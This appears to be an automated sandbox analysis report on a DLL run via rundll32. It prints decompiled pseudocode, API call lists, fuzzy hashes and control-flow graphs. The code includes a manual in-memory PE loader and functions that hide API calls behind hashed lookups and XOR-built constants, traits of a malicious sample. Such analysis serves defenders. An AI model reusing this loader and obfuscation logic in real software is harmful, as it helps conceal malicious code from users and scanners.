                                                                                                                      • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                      • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				void* _v8;
                                                                                                                      				void* _v12;
                                                                                                                      				signed short* _v16;
                                                                                                                      				void* _v20;
                                                                                                                      				void* _v24;
                                                                                                                      				long _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				char _v68;
                                                                                                                      				void* _v72;
                                                                                                                      				intOrPtr _v76;
                                                                                                                      				intOrPtr* _v80;
                                                                                                                      				intOrPtr _v84;
                                                                                                                      				void* _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				intOrPtr _v96;
                                                                                                                      				intOrPtr _v100;
                                                                                                                      				void* _t180;
                                                                                                                      				void* _t191;
                                                                                                                      				void* _t198;
                                                                                                                      				void* _t202;
                                                                                                                      				intOrPtr _t209;
                                                                                                                      				void* _t220;
                                                                                                                      				intOrPtr _t269;
                                                                                                                      				intOrPtr _t278;
                                                                                                                      				intOrPtr _t326;
                                                                                                                      
                                                                                                                      				_v100 = __ecx;
                                                                                                                      				_v72 = 0;
                                                                                                                      				_v20 = 0;
                                                                                                                      				if(E10001990(_v100, _a8, 0x40) != 0) {
                                                                                                                      					_v16 = _a4;
                                                                                                                      					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                      						_t10 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                      						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
                                                                                                                      							_t15 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                      							_v80 = _a4 +  *_t15;
                                                                                                                      							if( *_v80 == 0x4550) {
                                                                                                                      								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                      									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                                                                                                                      										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                      										_v32 =  *(_v80 + 0x38);
                                                                                                                      										_v12 = 0;
                                                                                                                      										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                                                                                                                      											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                                                                                                                      												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                                                                                                                      											} else {
                                                                                                                      												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                                                                                                                      											}
                                                                                                                      											if(_v88 > _v20) {
                                                                                                                      												_v20 = _v88;
                                                                                                                      											}
                                                                                                                      											_v12 = _v12 + 1;
                                                                                                                      											_v84 = _v84 + 0x28;
                                                                                                                      										}
                                                                                                                      										__imp__GetNativeSystemInfo( &_v68); // executed
                                                                                                                      										_t59 = _v64 - 1; // 0x71
                                                                                                                      										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
                                                                                                                      										_t65 = _v64 - 1; // -1
                                                                                                                      										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                                                                                                                      											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                                                                                                                      											_v24 = _t180;
                                                                                                                      											if(_v24 != 0) {
                                                                                                                      												L26:
                                                                                                                      												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                      												if(_v72 != 0) {
                                                                                                                      													 *((intOrPtr*)(_v72 + 4)) = _v24;
                                                                                                                      													asm("sbb edx, edx");
                                                                                                                      													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                                                                                                                      													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                                                                                                                      													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                                                                                                                      													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                                                                                                                      													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                                                                                                                      													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                                                                                                                      													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                                                                                                                      														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                                                                                                                      														_v8 = _t191;
                                                                                                                      														E10001810(_v8, _v16,  *(_v80 + 0x54));
                                                                                                                      														_t115 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                      														 *_v72 = _v8 +  *_t115;
                                                                                                                      														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                                                                                                                      														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
                                                                                                                      														if(_t198 != 0) {
                                                                                                                      															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                                                                                                                      															_v76 = _t269;
                                                                                                                      															if(_t269 == 0) {
                                                                                                                      																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                                                                                                                      															} else {
                                                                                                                      																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
                                                                                                                      															}
                                                                                                                      															if(E10001FF0(_v100, _v72) != 0) {
                                                                                                                      																_t202 = E10001CB0(_v100, _v72); // executed
                                                                                                                      																if(_t202 != 0) {
                                                                                                                      																	if(E10001E30(_v100, _v72) != 0) {
                                                                                                                      																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                                                                                                                      																			 *(_v72 + 0x2c) = 0;
                                                                                                                      																			L49:
                                                                                                                      																			return _v72;
                                                                                                                      																		}
                                                                                                                      																		if( *(_v72 + 0x14) == 0) {
                                                                                                                      																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                      																			L47:
                                                                                                                      																			goto L49;
                                                                                                                      																		}
                                                                                                                      																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                      																		_t209 =  *0x10055a88; // 0x0
                                                                                                                      																		_t278 =  *0x10055a84; // 0x1
                                                                                                                      																		_t326 =  *0x10055a80; // 0x10000000
                                                                                                                      																		_v92 = _v96(_t326, _t278, _t209);
                                                                                                                      																		if(_v92 != 0) {
                                                                                                                      																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
                                                                                                                      																			goto L47;
                                                                                                                      																		}
                                                                                                                      																		SetLastError(0x45a);
                                                                                                                      																		L50:
                                                                                                                      																		E10002840(_v100, _v72);
                                                                                                                      																		return 0;
                                                                                                                      																	}
                                                                                                                      																	goto L50;
                                                                                                                      																}
                                                                                                                      																goto L50;
                                                                                                                      															}
                                                                                                                      															goto L50;
                                                                                                                      														}
                                                                                                                      														goto L50;
                                                                                                                      													}
                                                                                                                      													goto L50;
                                                                                                                      												}
                                                                                                                      												VirtualFree(_v24, 0, 0x8000);
                                                                                                                      												SetLastError(0xe);
                                                                                                                      												return 0;
                                                                                                                      											}
                                                                                                                      											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
                                                                                                                      											_v24 = _t220;
                                                                                                                      											if(_v24 != 0) {
                                                                                                                      												goto L26;
                                                                                                                      											}
                                                                                                                      											SetLastError(0xe);
                                                                                                                      											return 0;
                                                                                                                      										}
                                                                                                                      										SetLastError(0xc1);
                                                                                                                      										return 0;
                                                                                                                      									}
                                                                                                                      									SetLastError(0xc1);
                                                                                                                      									return 0;
                                                                                                                      								}
                                                                                                                      								SetLastError(0xc1);
                                                                                                                      								return 0;
                                                                                                                      							}
                                                                                                                      							SetLastError(0xc1);
                                                                                                                      							return 0;
                                                                                                                      						}
                                                                                                                      						return 0;
                                                                                                                      					}
                                                                                                                      					SetLastError(0xc1);
                                                                                                                      					return 0;
                                                                                                                      				}
                                                                                                                      				return 0;
                                                                                                                      			}






























                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(00657A60), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(00657A60), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 259 10001aa0-10001aa2 249->259 260 10001aa4-10001ac9 VirtualAlloc 249->260 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 259->251 262 10001acb-10001acd 260->262 263 10001acf-10001afe call 10001810 260->263 262->251 263->248
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 275 1b7f5d-1b7ff1 call 1c20b9 call 1caa30 CreateProcessW
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,001BAD99,?,?,?,181C8C04,001BAD99), ref: 001B7FEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563579684.00000000001B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563637304.00000000001D3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                      • Instruction ID: a86c8ab35bad83d7a7cb8abbb095f3e0bc31636ac63a4d2043a8c11661d562fa
                                                                                                                      • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                      • Instruction Fuzzy Hash: BD11D372402128BBDF629F91DD09CEF7F79EF193A4F549144FA1921121D3728A60EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 280 1c46bb-1c473b call 1c20b9 call 1caa30 SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E001C46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				void* _t21;
                                                                                                                      				intOrPtr* _t25;
                                                                                                                      				void* _t26;
                                                                                                                      
                                                                                                                      				E001C20B9(_t21);
                                                                                                                      				_v20 = 0x3f5bb0;
                                                                                                                      				_v16 = 0;
                                                                                                                      				_v12 = 0x996874;
                                                                                                                      				_v12 = _v12 << 0xf;
                                                                                                                      				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                      				_v8 = 0xebf0af;
                                                                                                                      				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                      				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                      				_t25 = E001CAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                      				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                      				return _t26;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 001C4735
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563579684.00000000001B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563637304.00000000001D3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1514166925-0
                                                                                                                      • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction ID: 2d3cbc9fc1c8f88bf3c1c50fecdbfc819674b3bb4817b4ecca3bb3e6d8c316c0
                                                                                                                      • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction Fuzzy Hash: 13011A75802218BBCF15AFD5DC098DFBFB8EF55394F108149F91826211D2758A60DBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 285 1b93ed-1b9461 call 1caa30 ExitProcess
                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E001B93ED() {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				intOrPtr _t24;
                                                                                                                      
                                                                                                                      				_v28 = 0xda6c64;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v12 = 0x88a564;
                                                                                                                      				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                      				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                      				_v8 = 0xd9241f;
                                                                                                                      				_v8 = _v8 * 0x5c;
                                                                                                                      				_v8 = _v8 + 0xccdd;
                                                                                                                      				_v8 = _v8 + 0x903;
                                                                                                                      				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                      				E001CAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                      				ExitProcess(0);
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 001B945B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563579684.00000000001B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.563637304.00000000001D3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
